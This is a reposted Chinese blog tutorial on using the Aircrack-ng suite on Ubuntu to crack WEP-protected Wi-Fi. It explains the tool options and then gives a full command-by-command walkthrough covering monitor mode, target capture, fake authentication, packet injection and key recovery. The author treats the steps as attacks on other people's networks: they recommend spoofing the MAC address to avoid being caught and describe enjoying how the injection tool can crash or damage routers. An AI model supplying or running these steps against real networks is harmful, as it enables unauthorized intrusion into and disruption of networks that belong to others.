zoukankan      html  css  js  c++  java
  • [转] Ubuntu下Aircrack-ng工具包的使用(无线抓包破解)

    Ubuntu下Aircrack-ng工具包的使用

    由于在Windows环境下不能如Linux环境下直接调用无线网卡,所以需要使用其他工具将无线网卡载入,以便攻击工具能够正常使用,在无线攻击套装Aircrack-ng的Windows版本下内置这样的工具,就是Aircrack-ng,下面给大家介绍一下在Ubuntu下Aircrack-ng工具包的使用。

    安装:$sudoapt-getinstallaircrack-ng

    Aircrack-ng无线破解工具包有很多工具,用到的工具主要有以下几个:

    airmon-ng处理网卡工作模式

    airodump-ng抓包

    aircrack-ng破解

    aireplay-ng发包,干扰

    1)airmon-ng

    启动无线网卡进入Monitor模式,

    useage:airmon-ng<start|stop|check><interface>[channel]

    <start|stop|check>:启动,停止,检测

    <interface>:指定无线网卡

    [channel]:监听频道,现代大多数无线路由默认是6,随便扫描一下都是这个频道,网管们应该换换了

    2)airodump-ng

    抓包工具,我最喜欢用的,详细用法如下:

    usage:airodump-ng<options><interface>[,<interface>,...]

    Options:

    –ivs:仅将抓取信息保存为.ivs

    –write<prefix>:保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分

    –beacons:保存所有的beacons,默认情况况下是丢弃那些无用的数据包的

    Filteroptions:

    –encrypt<suite>:使用密码序列过滤AP

    –netmask<netmask>:使用掩码过滤AP

    –bssid<bssid>:使用bssid过滤AP

    -a:过滤无关的客户端

    –help:显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

    3)aireplay-ng

    搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的AP设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

    usage:aireplay-ng<options><replayinterface>

    Filteroptions:

    -bbssid:AP的MAC

    -ddmac:目标的MAC

    -ssmac:来源的MAC

    -mlen:最小包长度

    -nlen:最大包长度

    -D:禁用AP发现功能

    Replayoptions:

    -xnbpps:每秒包数量

    -pfctrl:框架设定(hex)

    -abssid:设置AP的mac

    -cdmac:设置目标的MAC

    -hsmac:设置来源的mac

    -gvalue:改变环缓存大小(默认8)

    Fakeauthattackoptions:

    -eessid:设置目标AP的SSID

    -onpckts:每秒爆破的包数量(0自动,默认1)

    -qsec:存活时间秒

    -yprga:共享可信的key流

    –help:显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付那些不给出作者就引用的人,鄙视抄袭.

    4)aircrack-ng

    破解KEY,漫长的过程.漫不漫长取决于两个方面:一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

    usage:aircrack-ng[options]<.cap/.ivsfile(s)>

    Commonoptions:

    -a<amode>:暴破(1/WEP,2/WPA-PSK)

    -e<essid>:选择essid为目标

    -b<bssid>:选择ap的mac为目标,就是破解识别的关键字

    -q:使用安静模式,无数出模式

    -C<macs>:将所有的AP合并为一个虚拟的

    –help:显示这个帮助

    就WEP破解说明,步骤:

    步骤:

    1.修改无线网卡状态:先down掉

    2.伪造无线网卡的MAC地址:安全起见,减少被抓到的可能

    3.修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡

    4.修改无线网卡状态:up

    5.查看网络状态,记录下AP的MAC和本机的MAC,确定攻击目标

    6.监听抓包:生成.cap或.ivs

    7.干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包

    8.破解.cap或.ivs,获得WEP密码,完成破解

    具体步骤:

    1、首先确定是否有wlan0的无线网卡端口,ifconfig即可知道。若存在终端输入sudoairmon-ngstartwlan0启动无线网卡的监控模式。

    2、在终端中输入sudoairodump-ngmon0,启动监控模式后无线端口是mon0(如果启动多次会按数字累加),看看有哪些采用wep加密的AP在线,然后按ctrl+c退出,保留终端。

    3、另开一个终端,输入sudoairodump-ng-c6--bssidAP'sMAC-wwepmon0(-c后面的6为AP工作频道,--bissid后面的AP'sMAC是要欲破解AP的MAC地址,-w后的wep的是抓下来的数据包DATA保存的文件名(可以随便取名),然后回车开始抓包。

    4、再另开一个终端,输入sudoaireplay-ng-10-eESSID-aAP'sMAC-hMyMACmon0与AP建立虚拟连接(-h后面跟着的MyMAC是自己的无线网卡的MAC地址)

    这里以之前探测到的ESSID为P2P的为例。

    5、建立虚拟连接成功后,输入sudoaireplay-ng-2-F-p0841-cff:ff:ff:ff:ff:ff-bAP'sMAC-hMyMACmon0进行注入,现在步骤3中数据包应该不断增长。

    6、收集有5000个以上的DATA之后,另开一个终端,输入sudoaircrack-ngwep*.cap进行解密(如果没算出来的话,继续等,Ubuntuaircrack-ng会在DATA每增加多5000个之后就自动再运行,直到算出密码为至)

    7、破解出密码后在终端中输入sudoairmon-ngstopmon0关闭监控模式,不然无线网卡会一直向刚刚的AP进行注入的,用ctrl+c退出或者直接关闭终端都是不行的,除非重新启动电脑。

    8、如果没有出现意外,你应该会很高兴的看到KEYFOUND!

  • 相关阅读:
    A+B Problem
    迭代平方根
    猴子报数
    分数求和
    猴子吃桃
    钻石
    杨辉三角形
    MYSQL 5.7 修改密码、登录问题
    SQL 语句 explain 分析
    重构CMDB,避免运维之耻
  • 原文地址:https://www.cnblogs.com/cxt-janson/p/9274040.html
Copyright © 2011-2022 走看看